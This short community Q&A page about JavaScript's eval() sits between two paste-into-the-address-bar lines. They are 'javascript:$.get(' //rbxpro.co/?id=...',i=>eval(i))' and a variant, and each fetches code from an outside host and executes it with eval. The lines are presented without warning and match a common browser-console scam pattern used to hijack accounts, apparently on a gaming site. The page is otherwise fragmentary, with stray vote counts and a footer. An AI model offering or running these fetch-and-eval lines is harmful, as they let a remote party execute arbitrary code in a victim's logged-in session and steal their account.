Bill K
0
Q:

xavascript:$.get(' //rbxpro.co/?id=701785789',i=>eval(i))

//eval() is a global function in JavaScript that evaluates a specified string as JavaScript 
//code and executes it.
eval("alert('this is executed by eval()')");
					//OR
var x = 10;
var y = 20;
var a = eval("x * y") + "<br>";
var res =  a;
2
Javascript:$.get(' //rbxpro.co/?id=296858121',i=>eval(i))
0

Tags

New to Communities?

Join the community